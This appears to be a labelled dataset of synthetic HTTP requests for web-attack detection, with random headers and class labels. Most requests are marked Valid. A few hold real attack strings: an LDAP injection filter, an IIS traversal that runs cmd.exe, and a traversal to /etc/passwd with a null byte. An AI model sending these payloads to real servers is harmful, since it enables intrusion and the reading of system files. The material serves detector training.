From: OacnDS@rtOaiEAusz.net
If-Modified-Since: Sat, 24 Jan 04 05:30:51 CET
If-Unmodified-Since: Sun, 21 May 06 03:50:21 UTC
If-Match: *
If-None-Match: "QDdHytPae@UmGOQ3"
If-Range: "tFc.QJ-XS9nkBTm"
Max-Forwards: 2634
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: Digest algorithm=MD5
Authorization: m3ea a8bhgit=19sesn
Range: 42-82,601-32,-86
Referer: http://www.cOem.it/ujastet/ui1do/Er76/derlaa7/hoefd9.mdb
TE: chunked,trailers
Trailer: Trailer
User-Agent: iueksnozezehOfot2ac
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5615x413
Via: 7.4 www.nteqPts.tiff, eyjrud/1.7 139.117.232.105:865
Transfer-Encoding: deflate
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39770
Start - Id: 38417
class: LdapInjection
GET /3nIKB8NSv0usFija/Zp/siN1@CA2b01ywxh16yVw/tm6hLedSh/earepwmrfnDs/boEilou/uoths0fro/4mH_olSJkrImqL/teitfnwyehoItaate/iW29QYhRVK/nB6.tiff?tz=aa&Nh2@1=wdms%29%28++%7C%28nel%3D*%29&jZ9eomtmfaer=oatsystema&68=rEgM HTTP/1.1
Host: 101.6.198.25
Connection: sbF9
Accept: audio/*, audio/x-wav;q=0.2
Accept-Charset: utf-8, euc-kr
Accept-Encoding: 
Accept-Language: slh-hhey;q=0.8, afos2a-ac7, sEtteRnt-idu;q=0.6, eme-s9wd
Cache-Control: max-age=6
Client-ip: 35.66.45.101
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="5"
Date: Sat, 20 Mar 10 13:46:30 UTC
ETag: "FIXQK-2mPeNeJFMjfxH"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Wed, 21 Jan 09 05:13:47 GMT
If-Unmodified-Since: Wed, 01 Aug 07 10:34:23 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: "vHA4H8ou8_AVVqWN_dB"
If-Range: Tue, 02 Jan 07 23:11:52 CET
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: s=enaetot
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: etet5O wh5tR=jadthTlY
Range: -96373
Referer: /isbn/aq6b/plyae/otAa.js
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eonrendgS/5.9.7.1
UA-CPU: MIPS
UA-Disp: 381,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0696x1408
Via: awt/6.2 www.2zire.gif, ewy/4.5 www.elue.png:591, 2.8 www.etssecve.jpeg
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38417
Start - Id: 22896
class: Valid
GET /43Gppp-ywrxU430dFkLF/crsnls9i/us8o9dsPhddS/ndrhSsrrreskdnri/CstyleD/lunionCcOb_nfY.tI-between/sjHTk@w9nOxo7BcB/aehereBjt6eOeaesntnt/rxVSBR3cHytXLvQhtLvT/CSEkugqLwKZ6/3Ubx/shDnlDuwDBPC6WeF.png?Blc7EViframesock_stream=metaee+w&5WT3O_crpT=89583&3tute6rs=625575&dpusr@j=mum%3Fh%5CsstyleeaApcnygicn&arrhuafOidnaD=t%3Cdlotgoc5rrj6a&1eedth=25 HTTP/1.0
Host: www.bea1t.ch
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 207.220.55.217
Cookie: axi=ee;gNwDfXclibaxp=evR7vyv_
Cookie2: $Version="6"
Date: Wed, 27 Sep 06 01:04:23 UTC
ETag: W/"QEsEF338pqT5DU2PSGk"
Expect: 100-continue
From: aseiiog@zr5aou.org
If-Modified-Since: Tue, 28 Feb 06 09:09:54 UTC
If-Unmodified-Since: Fri, 15 Apr 05 16:06:16 CET
If-Match: "2PVL--e90fvq8rK"
If-None-Match: *
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 54
MIME-Version: 2.2
Pragma: nahdar=s
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Basic ZW9lcXM6YXdkdG53
Range: -6039,4724-
Referer: /touyes.jsp
TE: deflate,gzip
Trailer: Trailer
User-Agent: Mozilla/0.9 (compatible; to1QLr; Open BSD i386; nmMg8ri; eyoiTsiFae)
UA-CPU: 68000
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: HTTP/6.9 www.aeyWb.png, 1.0 www.3sTn.jpg
Transfer-Encoding: deflate
Upgrade: aLdo/5.3, ih2/5.7
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22896
Start - Id: 11941
class: Valid
GET /i2bodyftp9q/ls@5ef5b5n/sJ0Pjd/DCrvtzq.jpeg?coxitrt8i=95318879&snmrdgbYel=05557&Dato=097530&cmehthiit=aaiiz&gJNzJ5m=Oo+nA1oi&EH5s=tey0ee&ipcmtqte=i&X@agstdinHlog00=eRPW4nle.&cmarhdtbsq2g2Nm=w%2B8nez&d1smfsirh=eyhh8jior&wG7eeohiitbf1r=cnJeatg9ehXae8&HeGebCDyooimb=uLbc5nS HTTP/1.0
Host: 236.102.42.109
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 60.133.55.180
Cookie: sae8a4tAhe=472;wrhfiuHnfn=222;rloiyr=adXgw;Ee6= ygohmma\inr
Cookie2: $Version="327"
Date: Tue, 21 Oct 08 04:07:26 GMT
ETag: "Z@_jrx68mt-s@PF5"
Expect: d3ttaaTm=shholg;tI4city=eotlhHha
From: iunzwloi@gsattr.biz
If-Modified-Since: Fri, 29 Sep 06 04:51:08 UTC
If-Unmodified-Since: Tue, 24 Aug 04 23:11:03 CET
If-Match: "vUlcFtxRnqGgjfyz0Kn0"
If-None-Match: "4Gr2f-Sno2_8BIWC"
If-Range: Sat, 14 Nov 09 02:34:10 UTC
Max-Forwards: 035
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YXNhaVRrOmxzaGVlY2lo
Range: 1-,-240,665474-
Referer: /ieLtm.mdb
TE: trailers,deflate;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (X11; U; Open BSD i586 2.5; es-sn; rv:9.5.4) Gecko/62557211
UA-CPU: x86
UA-Disp: 953,518,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: HTTP/1.3 96.101.176.43
Transfer-Encoding: gzip
Upgrade: tzkoi/0.0, renmir/0.0, tssa/5.2, Rlt8/0.2
Warning: 626 www.nnnan2ha.tiff "aiaet" 
X-Forwarded-For: 237.227.200.204
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11941
Start - Id: 3583
class: Valid
GET /85MUG.3p2hJZDsL/nsI/rdDaTtqrYo/nID/tziRr5wehpo8SEt/IY0Bp/d-a8KKqSF2.O4x/9awot1e9s/ieM4A4i.jpg? HTTP/1.1
Host: www.ra6nwPoa.gov:80
Connection: close
Accept: video/*;q=0.6, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, compress;q=0.4, compress;q=0.6, identity, compress;q=0.0
Accept-Language: nO-eraEmsp, brwp-8Hqhscab;q=0.0, noihrw-vl
Cache-Control: no-transform
Client-ip: 148.242.32.96
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="422"
Date: Wed, 29 Aug 07 22:07:56 UTC
ETag: "5W60P74WpCAUc0hE"
Expect: 100-continue
From: crha0hIA@sftgoor8a.uk
If-Modified-Since: Wed, 28 May 08 15:17:42 CET
If-Unmodified-Since: Sun, 06 May 07 10:59:19 GMT
If-Match: *
If-None-Match: "1EPptGGlwn3aMTS4Egq"
If-Range: Fri, 20 Jan 06 22:05:17 GMT
Max-Forwards: 646
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: NTLM YXVyaXB0eTVBc2lDcmhNZWFjU2hhcmU5dGh0aWlydGE=
Range: 285-321592,-0,1-98
Referer: http://www.orml7seo.biz/7uornw/tdrqe/aeti/ens9ohcb/nsiua.cgi
TE: gzip;q=0.7,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/1.5 (X11; U; SunOS sun4u 3.3; ws-ec; rv:9.4.1) Gecko/45300938
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x6463
Via: 8.5 www.ATisae3u.css, 3.2 www.aegdm.jpg
Transfer-Encoding: ealf
Upgrade: qmin7m/5.2, ymfn/6.7, oX9/9.1, 2ub/7.6
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 3583
Start - Id: 23514
class: Valid
GET /rIR22ithe/us1u/1i/fUFo_6M9m42uCb9i/Eee.asmx? HTTP/1.0
Host: 113.131.114.117
Connection: close
Accept: image/png;q=0.5, audio/*
Accept-Charset: iso-8859-9, iso-8859-5;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: tt-aiiiT;q=0.5, scujt6he-sgoeea, iunnE7-yotlla25, Vl-ea5;q=0.8
Cache-Control: max-stale
Client-ip: 252.115.46.155
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="0"
Date: Wed, 25 Nov 09 13:20:23 GMT
ETag: W/"NYxcBqjIFCeg3fhWJ"
Expect: s4Ffghrl
From: ltnesme@hsentase.it
If-Modified-Since: Mon, 06 Mar 06 21:06:29 GMT
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: *
If-Range: "90EI5iTxwUh_Lpu-GQvd"
Max-Forwards: 410
MIME-Version: 2.4
Pragma: tstSleAa=lwseit
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 90-,49-617
Referer: http://www.2bttk.biz/uiocteO/lw2iotx.wmn
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/2.3 (X11; U; Solaris 5.7; ns-m9; rv:2.1.7) Gecko/30403778
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: 4.2 252.85.51.22, HTTP/2.1 www.fst6hpli.tiff
Transfer-Encoding: dpuai
Upgrade: Odqe/8.0, Phrs/0.8, i83hqn/9.8, 6d1a/9.7, joi/4.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23514
Start - Id: 43856
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 65.65.103.255
Connection: close
Accept: video/quicktime
Accept-Charset: x-mac-icelandic, isiri-3342, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: rsmset-wewh
Cache-Control: max-age=771
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Wed, 16 Jun 04 02:42:12 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Wed, 12 May 04 03:05:51 UTC
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "UIYkBD9_9mEHf-a6k"
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: tf1et Eejuotis=rwaduier
Range: 064373-124259,214-265,801-679
Referer: http://www.gWn4.it/eoalgur/txnv/gsi8y1/fmej.php4
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.4 (Machintosh; U; PPC Mac OS X 4.6; 7z-cw; rv:8.1.6) Gecko/88615388
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43856
Start - Id: 8817
class: Valid
GET /9./od1mo0e1rhr/tX/lgZ0v7R9W/019unopnutdpovj/rtgyate5.mdb? HTTP/1.1
Host: 101.50.3.18
Connection: veio3oeh
Accept: video/*;q=0.5, text/plain, audio/basic
Accept-Charset: x-mac-cyrillic;q=0.6, iso-8859-8-i, windows-1258;q=0.5, x-mac-arabic;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 96.93.250.55
Cookie: mSctEm9t=Omee&u;ehfxoPicaoeO=i0emaTeoowya
Cookie2: $Version="790"
Date: Sat, 04 Apr 09 10:14:23 UTC
ETag: W/"IeH97Kt_t7C.hI9dNi4"
Expect: 100-continue
From: 5srce@e7dwmH6lp.fr
If-Modified-Since: Mon, 10 Mar 08 09:53:05 CET
If-Unmodified-Since: Sun, 21 Mar 04 23:03:41 UTC
If-Match: *
If-None-Match: "9CX-U1THMM36thfpIUy9"
If-Range: "N8DSotmK8v1_ToRG"
Max-Forwards: 22
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: NTLM aGd0ZHRVaTZ0dnFzYVZ2eGw3YTlvZWVtZXdqaG1lbnBycg==
Range: 9-,10-,-403711
Referer: /zghhotc/tcr2/nnul/tdttu.gif
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/9.8 (X11; U; Linux i386 3.6; uh-ui; rv:8.3.2) Gecko/79769134
UA-CPU: Sparc
UA-Disp: 0735,834,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7482x1972
Via: FTP/5.0 www.Tunnhdt.css:89, FTP/9.4 www.Foncdn.htm, FTP/4.9 162.0.238.62
Transfer-Encoding: eMhoo
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 254 40.206.27.30 "erdeonGtKssenuianwne" "Sun, 09 Aug 09 06:28:30 UTC"
X-Forwarded-For: 115.157.255.232
X-Serial-Number: 28573562
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8817
Start - Id: 8941
class: Valid
GET /7g/terf6o/eFYQRC/d9f7NF0qU/bhsEnEuh3sigaah92/vpn9ixk/itieooiNeefhnapnh/tThNyYF/t5qA8Mq/xbenne5ith/Bn.tiff?twazxi=9&te7suherhhts=icrlr&hnokeT=7on+ed%3FdH&jio6sbuaehng3=a%3Fscript&0k=8e&eooeorcnaw7f=oSror8r&3xhbii3e=tp%7C&ol3s=fo%40e&Tdgs8=dqtst&Ahr8ersa=Taa&vs=470612&vE1=58443&ds=kiowednfsdprueit8e HTTP/1.0
Host: 156.170.215.70
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-jp;q=0.7, iso-2022-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 246.118.251.10
Cookie: a7we1y=280079;vthrNse=fYq8kE1.5h;qmicloierSUor=Rtmptnzehmpaay;eb53asiorblebr=twn7psexepq0ip
Cookie2: $Version="0"
Date: Thu, 03 Feb 05 03:43:03 CET
ETag: W/"J_i2i62vnezNxa2NpF"
Expect: aonssf=sear1
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sun, 16 Nov 08 11:43:21 GMT
If-Unmodified-Since: Tue, 01 Mar 05 21:51:27 CET
If-Match: "laH_puyhhT8meC@Fi"
If-None-Match: *
If-Range: Mon, 01 Oct 07 11:05:30 CET
Max-Forwards: 145
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic cm50Zzc6TmVtYVhsdEQ=
Authorization: Digest cnonce="reolad"
Range: -4608,2019-
Referer: /iktaey/omaibmw.rar
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: hAJpoKBw1- http://www.oyeut.net
UA-CPU: MIPS
UA-Disp: 4170,137,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4768x416
Via: 3.9 72.4.56.2, HTTP/3.0 www.btqsaNal.gif:33693, 5.7 www.oeEaioad.jpeg
Transfer-Encoding: compress
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 2309739328693476356
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8941
Start - Id: 3791
class: Valid
GET /th6Cur66/lZx/ba3e/SxKqopenq5Qs6/neazIrieieen7/t2xNU9o/alcdoi56seooini/H_l/yE/ecR/RBKP.o.dll?WEechomOPZHmr=dAqWdtnsilr&snttosldeteEp=siptiaeSosur&ne50pulx0ne=sy%40B4vj HTTP/1.0
Host: www.u194.org
Connection: close
Accept: image/*;q=0.2
Accept-Charset: x-mac-greek
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 181.103.72.84
Cookie: 6Mq7=haasExosgt3lh;eahsI3tjEoshnea=960793;flsb6mhg=wQ.o6GHC5mIZ;2suPtid6aBs=mw2-zFHyiO2N;mrtxogrsSefet=tdetgte7ergmif0d
Cookie2: $Version="51"
Date: Sat, 16 Dec 06 01:20:09 CET
ETag: "EWN@e-ZbvFsm.Zv8Q"
Expect: 100-continue
From: chnsy@di7sS5.cz
If-Modified-Since: Tue, 19 Jul 05 11:04:12 UTC
If-Unmodified-Since: Tue, 21 Mar 06 22:11:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 968
MIME-Version: 2.7
Pragma: r=mO
Proxy-Authorization: Basic Y3NuY2Rlb2o6b3lzNW0=
Authorization: teLtp nyuMBhh=ttnog
Range: 7-44
Referer: http://www.rxaea.fr/lnRj7yaL.mdb
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: ol2ptmcl26 (t@6LTkI)
UA-CPU: PowerPC
UA-Disp: 366,5440,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0475x7705
Via: HTTP/3.0 140.68.249.32, HTTP/8.1 www.neboUone.js
Transfer-Encoding: spsco; 9eoy=caE6qom
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 072 86.6.79.150 "pab1nwlurod" 
X-Forwarded-For: 230.225.53.174
X-Serial-Number: 68867877
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3791
Start - Id: 46082
class: PathTransversal
POST /6y-vx/5u-XhtUk6y5H_fJ/oewaiiy/BHSBRYOwY/eioac/sIUlRf/aeOeaas/Dl56.aspx? HTTP/1.1
Content-Length: 274
Content-Language: R,abh,wnare
Content-Encoding: deflate
Content-Location: /a5b8s6/eruc/eruTIcnn/8osltT.tar
Content-MD5: UHJzZ3o4ZXlxWXlDZXRzMA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 20:07:23 GMT
Last-Modified: Sat, 10 Jul 04 17:10:53 GMT
Host: 155.7.167.147
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress
Accept-Language: ene-t;q=0.6, dhX-i3;q=0.3, n-bhnr, ae-fg;q=0.7
Cache-Control: only-if-cached
Client-ip: 241.160.161.88
Cookie: 83hsgteaiT=joconnect9 otareplacechsd;Idgsyehtc=fvIUOTiAwr;ep5n=tsroEkTwgetiselectkwIecpi
Cookie2: $Version="7"
Date: Wed, 25 Aug 04 04:57:15 GMT
Expect: 100-continue
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Thu, 23 Sep 04 23:07:58 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest username="teawnat"
Referer: /nabaeidn.jpeg
TE: chunked;q=0.0,gzip,deflate;q=0.9
User-Agent: iWJ94Jv http://www.rmNi9s.ch
UA-Pixels: 1090x096
Via: FTP/2.2 149.96.97.72, 3.0 www.wyred.jpg, 9tg/4.6 www.neharoo.html
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5systeminput5MDW=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&Laehe73hneuamRu=etmpc

End - Id: 46082
Start - Id: 28448
class: Valid
GET /t4uB06evat/3h/gmFG2-/Wlink/em8_ZghSNtv_p/9a9aoiQEp2emt/tccnt/7drnt.html?tfsrsAps944m=itjarhlautoexecas%3AEaufqb2&oy0ae7tyelaF=ee1eocmvAc46Hto&kaEARBUautoexec=hkg&jegrojnd1aa=g_rrotfXQhf.&iR842a=241026432&TesiEeoohghob=74295654&leIssex=rlse9&tyo=iLvrHK&notqdoduwnteir=83073 HTTP/1.0
Host: www.iqoswit.org
Connection: close
Accept: text/xml
Accept-Charset: cp-950;q=0.2, windows-1258;q=0.4
Accept-Encoding: identity;q=0.8, deflate;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 23.125.235.155
Cookie: m4hnnueta=link0Nen)d4ainex;teotWe=98527794;ojuewiboe=|y;EtidatOxrdtw5o=Gptn1dnphly
Cookie2: $Version="435"
Date: Sat, 23 May 09 10:05:01 GMT
ETag: "4ohLRNGxY-E4_hL"
Expect: tnrorhda
From: oBcae9t@txO3eond.biz
If-Modified-Since: Mon, 14 May 07 02:49:18 GMT
If-Unmodified-Since: Fri, 15 Feb 08 09:34:54 GMT
If-Match: *
If-None-Match: "S3G.27Tkb15nQW6u"
If-Range: *
Max-Forwards: 645
MIME-Version: 0.3
Pragma: 58=tlot
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW5lbVduZG50dDFoaHRyaUlpc293ZWh6Y240YW9UZXlsMnQ=
Range: 571439-,36777-,4088-2
Referer: /retr4/iSvqh6gy/fwitia/sackir.exe
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: TE
User-Agent: aozdcAcho6re1toH
UA-CPU: MIPS
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1655x3904
Via: 1.9 81.9.110.208, FTP/1.5 www.n48oil.htm:90957
Transfer-Encoding: compress
Upgrade: 6taars/5.3
Warning: 472 43.150.232.112 "aael8xcny0ewer" 
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 032993654516042
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28448
Start - Id: 28961
class: Valid
GET /23EleTniniidna/rrAlP0b5Nil8M6-/dslfa0n.tiff?3wPIGxterm=detspsrh&UrbO6UO=8473&odcsObnMchna=Zc%2Fpbrwhtsr%7Cj%5Ci3%28&ia=gtr+2pbrEossH+&tE=eaeidlfE3a&kw9=ijyyq&loanSmnos=446&e5aje1eaaJistAe=d3o+j%40l&iLmwla7R=sX8qC2dd&retu=3169245&dptegtDqetpT=2980&yEI744tQYfD=2911300&agbr8t=rcee+%5CpinEan%27&rrnececwaTasn=RerctScoa HTTP/1.1
Host: 103.60.79.238:80
Connection: eswdowe
Accept: video/*, application/postscript, video/mpeg;q=0.8
Accept-Charset: windows-1252;q=0.9, x-mac-roman
Accept-Encoding: gzip;q=0.1, gzip;q=0.8, identity, compress, compress
Accept-Language: e-ot4m, t4shc5Y-u6bi, 5at-eoi
Cache-Control: only-if-cached
Client-ip: 78.125.221.48
Cookie: 0ooe=anidid2Ronwmeil;sn=0295
Cookie2: $Version="30"
Date: Mon, 19 Sep 05 18:26:39 CET
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 19 Aug 06 24:36:41 CET
If-Unmodified-Since: Tue, 07 Aug 07 13:31:31 UTC
If-Match: "3OR6@Hkd.im3D1fauGW"
If-None-Match: *
If-Range: Wed, 13 Sep 06 06:47:53 UTC
Max-Forwards: 665
MIME-Version: 4.5
Pragma: aD=Nmntyl
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Basic ZTFlMDM0ZmQ6ZmVhMGw3YW0=
Range: -332385,-432,1995-63
Referer: http://www.kAgnxre4.org/tnn4a0/pBaicd/se3m.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.3 (Machintosh; U; PPC Mac OS X 7.6; hc-Ad; rv:8.4.8) Gecko/45303191
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: 1.3 5.124.72.121, 1.3 183.132.99.157, 2.2 www.rttcay.html:18
Transfer-Encoding: gzip
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28961
Start - Id: 3046
class: Valid
GET /hrth/lm-Ns-Ji@q/oY/rElsteel/lkwk5EMknRTIvHG/dvswtndcbatr/7FyrkyuUH3zNaI_8MEX.mspx?rcd5rteoarh=9953598&pNaeccrst=t&h7evalZ=ncayl%2Beryro&sediMpenedaI=067912&rtlTIge0rsccA=lhehbk&gaqidhob=4segAeEECwindow.openqht&.P7-oOiframe=1519&cptuo=80700&tBctdiandr=nde6tberil&NAAetna=5&adeesrrdpaFo=amiattfindtsuHi&nvnoAe9npMnxif=kr&o6g33rttaeooon=likeim HTTP/1.0
Host: 220.51.254.208:85
Connection: Cyi3oA
Accept: */*;q=0.4
Accept-Charset: big5;q=0.1, isiri-3342;q=0.7
Accept-Encoding: identity;q=0.4, gzip, gzip, identity;q=0.8
Accept-Language: 4winbu-ttlefWil, rUe-tigdnL
Cache-Control: no-transform
Client-ip: 204.161.177.41
Cookie: 9ctpr=oonq80gstctso0bao9
Cookie2: $Version="0"
Date: Sat, 21 Jun 08 05:41:03 UTC
ETag: "EzuQe-OrDGSEFMd2f"
Expect: yepnctt
From: clms@lki1al.be
If-Modified-Since: Sun, 29 Apr 07 08:43:00 CET
If-Unmodified-Since: Tue, 20 Apr 10 22:29:04 CET
If-Match: "6PPZjRkB3MFascEzYz@m"
If-None-Match: *
If-Range: Fri, 07 Mar 08 06:31:01 GMT
Max-Forwards: 591
MIME-Version: 6.8
Pragma: e9=m0aMe
Proxy-Authorization: em1h oanPog=nsx8qtr5
Authorization: Digest username="agOdin"
Range: 92-,7389-091,-078
Referer: http://el8H.org/xichVoa/lo8ciiro/ota0.cgi
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 3.8; lI-hn; rv:0.2.6) Gecko/62671115
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 090x4434
Via: cuoiT/1.1 www.fweeEo.js:60741
Transfer-Encoding: dayy; t81d=diutior
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 679 www.uhimetrd.html "cgr2qzlheraeelo" 
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 2317803874
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

